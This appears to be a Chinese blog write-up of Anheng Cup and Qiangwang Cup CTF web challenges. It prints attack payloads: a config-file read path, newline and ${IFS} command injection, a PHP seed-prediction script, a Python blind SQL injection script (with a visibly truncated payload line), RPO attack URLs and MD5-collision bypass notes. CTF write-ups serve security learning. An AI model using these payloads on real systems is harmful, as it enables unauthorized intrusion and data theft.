安恒赛php_安恒&强网杯部分web

最新推荐文章于 2021-06-30 11:26:05 发布
最新推荐文章于 2021-06-30 11:26:05 发布
阅读量215 收藏
点赞数
文章标签: 安恒赛php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_30814157/article/details/113715894
版权

2ff34e647e2e3cdfd8dca593e17d9b0a.png

打了两天的比赛,第一个专心打了强网杯emm 题目是真的难 第二天去安恒杯水了水 还是安恒的题目比较友好,强网杯的web+pwn真的无力。。

简单总结一下吧。

安恒杯

题目名字想不起来了。

WebScan

第一个给了个扫描报告,结合题意可以知道是利用文件读取漏洞,直接去读apache2的配置文件。

file=/etc/httpd/conf/httpd.conf

web2

考点是命令执行+zip伪协议+伪随机数预测文件名

没有截图,先是个ping命令,0.1.0.1%0als

这里我随便弄了个错误的ip这样可以不用进入ping循环了,读到you_find_upload.php文件,可以看到一个上传页面,主要是

time() % rand(1,100000)%rand(1000,9000)文件命名是这个,但是一开始没有配置好,有列目录漏洞,可以直接上传了看了upload目录下名字,后来修上了。1

2

3

4

5

6

7

8

9

10

11

12

13

14<?php

$a=0;

$k=0;

$myfile = fopen("testfile.txt", "w");

while(1){

$a=(time() % rand(1,100000)%rand(1000,9000));

mt_srand($a);

$txt=mt_rand().' '.mt_rand()."rn";

fwrite($myfile, $txt);

$k++;

if($k==100000) break;

}

写脚本预测下,直接去里面找,当然这样写的话不一定爆破到种子,调大一点就OK了。

然后结合zip伪协议,但是过滤了../,也就是说使用zip伪协议的时候没法直接使用相对路径来查找,但是在源代码里可以看到绝对路径,直接绝对路径来getshell。

艰难的bypass

这个考点是之前那个sprintf造成的引号逃逸,还有就是waf比较难饶,直接上脚本吧。1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17# -*- coding: UTF-8 -*-

import requests

url = ""

def check(payload):

postdata = {'username':payload,'passwd':'xx'}

r = requests.post(url,postdata).content

#print r

return "password error!" in r

password = ''

for i in xrange(32):

for j in range(45,127):

payload = "%1$' || id=2 && binary passwd

print payload

if check(payload):

password = password + chr(j-1)

break

print password

然后username=username=%1$' || id=2 && binary passwd

登录之后是一个命令执行,直接给出payload吧:

%0als${IFS}$(expr${IFS}substr${IFS}$PATH${IFS}1${IFS}1)

强网杯

Three hit

这道题目是个二次注入,注入点在age,可以16进制编码绕过限制。

直接union查询把数据带出来4bc2d937d56166113de59e7ed4a90981.png

Share your mind

这里是rpo攻击的,附文章一篇1http://blog.nsfocus.net/rpo-attack/

首先看到1http://39.107.33.96:20000?dd

不太清楚bot是怎么写的。0aef188ef2942d5c4ef87b40661174e7.png

但是开着httponly,达不到cookie,后来经表哥指导知道是rpo攻击,

首先写入js代码,另标题为空绕过h1的坑

然后构造1http://39.107.33.96:20000/index.php/view/article/29593/..%2F..%2F..%2F..%2Findex.php

这里因为解析的问题导致漏洞的产生,客户端是把..%2F..%2F..%2F..%2Findex.php当成了一个文件,而服务端就一级一级往上跳了,相当于http://39.107.33.96:20000/index.php

但是在加载http://39.107.33.96:20000/index.php的时候会调用两个js文件。

路径是static/article/xxx啥啥啥的,但是客户端把..%2F..%2F..%2F..%2Findex.php解析成一个文件,也就是在http://39.107.33.96:20000/index.php/view/article/29593/这个目录调用相对路径的js代码,拼接起来相当于1http://39.107.33.96:20000/index.php/view/article/29593/static/article/xxx30af84f957e31b326194b99123a713e3.png

这样的话也就加载了我们写入的js代码,既然到了这里,那么就可以随心所欲了。

python1464d20f1a3a3b5d5d800dd3b8ddaf34e.png39dcabfe35ac2c64f43c706d564c462f.png

二次注入,构造闭合插入多条数据,直接在留言板找到flag。

web签到

主要是三层的md5绕过,前两层都可以直接数组绕过,最后一个利用两个文件的md5相同,但是实际bin数据却不同来做。1https://natmchugh.blogspot.com/2014/10/how-i-made-two-php-files-with-same-md5.html

Gao Ling
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
安恒X计划平台10月月赛逆向题easytree题目思路
iqiqiya的博客
10-27 3380
ps:做的晚了 最后十分钟才开始就下载下来这么一道题 难受 ida载入发现有UPX壳 file一下可以知道是windows下可执行文件 直接加上后缀.exe ESP定律脱壳 之后载入ida shift + f12看到有成功提示 双击进入 双击引用 F5 可以看到关键代码就在main() int __cdecl main(int argc, cons...
安恒赛php_安恒11月月赛周周练writeup
weixin_39881513的博客
12-21 313
前言11月月赛 完美错过时间,正好有周周练,基本都是一样月赛的web,记录下write up手速要快这题是10月月赛中的一题,直接看我上次的writeup:安恒月赛(十)web-2题writeup,这里不重复了image_upimage.png随意输入username和password登陆,image.png随意尝试上传了文件,好像只能jpg结尾,上传后无回显任何内容。page=upload当前页...
安恒的一次月赛
yyx的博客
04-29 587
easy-安恒12月月赛 打开页面出现代码,unserialize,需要反序列化,正则筛选值preg_match('/[oc]:\d+:/i',$data,$matches);发现过滤了O:4这类值,用O:+4可以过滤. 正常反序列化 O:4:“baby”:1:{s:4:“file”;s:8:“flag.php”;}会被过滤 所以用O:+4:“baby”:1:{s:4:“file”;s:8:“fl...
安恒6月月赛——又是crackme
地址ch3nye.top
06-30 811
分析 学长带带我 ~ 。~! 进来先看主函数 然后F5反编译成C语言伪代码,就完事了 然后在变量上使用快捷键R,转换为字符 按小端对齐拼一下,得到
安恒8月赛 MISC 标错的字符 WP
h1nt的博客
08-25 569
《关于WEB狗在转到RE的过程中两个都不会了只能在MISC混分这件事》 这个题做完发现有非预期解,而且速度快得多。。 先看看题目 打开一看 又双叒叕是验证码,而且这个给数据的方式越看越像机器学习。。 那就机器学习一把嗦了吧 用了别人的轮子:https://github.com/nickliqian/cnn_captcha 基本上就是按着人家给者的教程来,就是要改改一些参数 训练完后开本地接口(这些还是在人家的教程里) 然后现在问题是机器学习依然有失误的概率,所以我采用的方法是删除识别正确的图片:
安恒明鉴web漏洞扫描器
01-20
安恒明鉴Web漏洞扫描器】是一款专业的网络安全工具,主要针对Web应用程序的安全性进行深度检测,以发现潜在的漏洞并帮助企业或个人提前预防网络攻击。这款扫描器使用了先进的扫描技术和策略,能够自动化地执行多种...
2021“安恒·泰山杯”山东省网络安全大赛 (1).rar
12-07
2021“安恒·泰山杯”山东省网络安全大赛 CTF 真题
安恒杯pwn1
04-25
"安恒杯pwn1" 本文主要讨论的是安恒杯pwn1题目的解决方法。该题目是一个Pwn题目,利用了strcpy函数的栈溢出漏洞来获取shell。 首先,我们需要了解题目的基本信息。题目中提供了一个可执行文件pwn1,运行起来后显示...
安恒_务实的网络安全.pdf
08-15
在当今数字化转型的时代,网络安全已经成为企业生存与发展的重要组成部分。"安恒_务实的网络安全"这份文档关注的是如何将网络安全策略与业务目标紧密结合,以确保公司的核心利益不受侵犯。以下是其中涉及的关键知识...
安恒信息明御WEB应用防火墙产品白皮书.doc
11-09
安恒信息明御WEB应用防火墙产品白皮书.doc
安恒10月赛Web题目复现
0verWatch的博客
11-08 5302
前言 10月赛的时候去打那个瓜皮的领航杯(体验极差),还是回来复现安恒的题目比较好,质量还是有保证的,学到很多东西 正文 easy audit 这个题目确实有点脑洞。。运用了两个php函数一个是get_defined_functions这个函数是用于返回所有已定义函数的数组,而另外一个则是get_defined_vars 这个函数是返回由所有已定义变量所组成的数组 可以查看此网址:https://...
CTF-安恒19年二月月赛部分writeup
weixin_33968104的博客
02-26 1645
CTF-安恒19年二月月赛部分writeup MISC1-来玩个游戏吧 题目: 第一关,一眼可以看出是盲文,之前做过类似题目 拿到在线网站解一下 ??41402abc4b2a76b9719d911017c592,那么就奇怪了,这个??是什么东西,数一下加上??正好32位,应该是个MD5了,索性直接百度一下, 第一关答案出来了,试过了MD5值不对,hell...
安恒9月赛部分复现记录
0verWatch的博客
09-30 1875
前言 赶紧趁着电脑的屏幕修好了,刚好安恒web题目有复现,赶紧做。。。。。又从这几个题目里面学习到新知识了小结一下 正文 web babybypass 这个题目我记得我当初做的时候是一直考虑着用$以及_去绕过这些数字字母之类的东西,突然发现他这个题目里面把那个$以及_也经过了过滤,这样的话就少了很多可能性,而且这题比原题的限制长度小了,更有难度。现在就开始总结一下从这个题目学到的知识点 1.ph...
BUUCTF——[强网杯 2019]随便注 1
小白一枚多多关注的博客
03-17 362
这道题是强网杯的题,如果各位之前做过攻防世界有可能就知道强网杯代表着什么,代表着题很难,鹅鹅鹅,好了我们开始进入环境 进入环境后只看见了一段文字和一个文本框以及提交按钮,当然在这里我们还不能猜测出是用什么方式进行攻击,老规矩查看一下源代码看看有没有什么有价值的信息 可以看见源代码中说了一句sqlmap是没有灵魂的,那么就此可以判断出这道题应该是sql注入并且sqlmap是做不出来的,所以必须得是手工注入,那么手工注入就需要判断注入点在哪里,接下来就是图文解释了,太长了难的打字了 因为禁用了s
安恒2018年9月赛~简单加密
wxcmdn的专栏
12-11 1302
#!/usr/bin/env python # -*- coding:utf-8 -*- from Crypto.Cipher import AES from Crypto import Random def encrypt(data, password): bs = AES.block_size pad = lambda s: s + (bs - len(s) % bs) ...
安恒九月赛
weixin_30599769的博客
09-23 396
作为一名新菜鸡,就只能签下到,最后的re还是看了大佬的wp才明白的 1:NewDrive 首先,直接对IDA 里面 找到mian F5,然后发现 发现指针偏移 值没找到 ,然后就ALt+k 平衡栈堆。就ok 我分析了好久,都没分,比赛后也是个朋友 给了指点和他的wp我看才明白。 其实第一个就是base64加密 下面的就是rc4,其实不知道下...
安恒赛php_安恒四月赛部分Writeup
weixin_39551554的博客
12-21 195
前言这周有安恒的月赛,又是膜师傅的一天学到了一些骚姿势:webweb1打开题目发现给出了源码:show_source("index.php");function write($data) {return str_replace(chr(0) . '*' . chr(0), '', $data);}function read($data) {return str_replace('', chr(0)...
安恒11月赛Web题目复现
0verWatch的博客
11-30 2363
考完网络安全跟算法就赶紧来复现一下题目,又学到了一波知识了23333,这次题目的质量贼好 手速要快 上一个月的原题,不多说,直接在http头里面找到对应的password登陆以后直接就是关于页面上传的功能,这里的上传是服务器端的问题 直接上传一个非php结尾的文件即可解析 然后可以直接输入相关命令获取flag不多说 好黑的黑名单 这个题目质量很好,至少我以前都没见过这种盲注,里面利用了bet...
国赛分区赛awd赛后总结-安心做awd混子
Love&Share
06-30 9043
转载于安全客我自己发的哈~,感兴趣可以点链接进 https://www.anquanke.com/post/id/245158 安全客 - 有思想的安全新媒体 最近参加了国赛分区赛,我所在的分区正好是awd赛制,所以总结了下关于awd的基操,方便新手入门 简单来说就是三步 登录平台,查看规则,探索flag提交方式,比赛开始前有时间的话使用nmap或者httpscan等工具扫一下IP段,整理各队的IP(靶机的IP应该是比赛开始后才会给出) 登录ssh->dump源码->D盾去后门->一人写
网络地址转换(NAT)配置举例-安恒防火墙-NAT回流
08-14
本文提供了两个具体的配置例子来展示如何在安恒防火墙上实施NAT功能。 第一个场景是SNAT(源地址转换)的应用,目标是让公司内部的服务器(10.1.1.2,TCP 80端口)能够被外界通过公网地址200.0.0.2(TCP 8080端口)...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值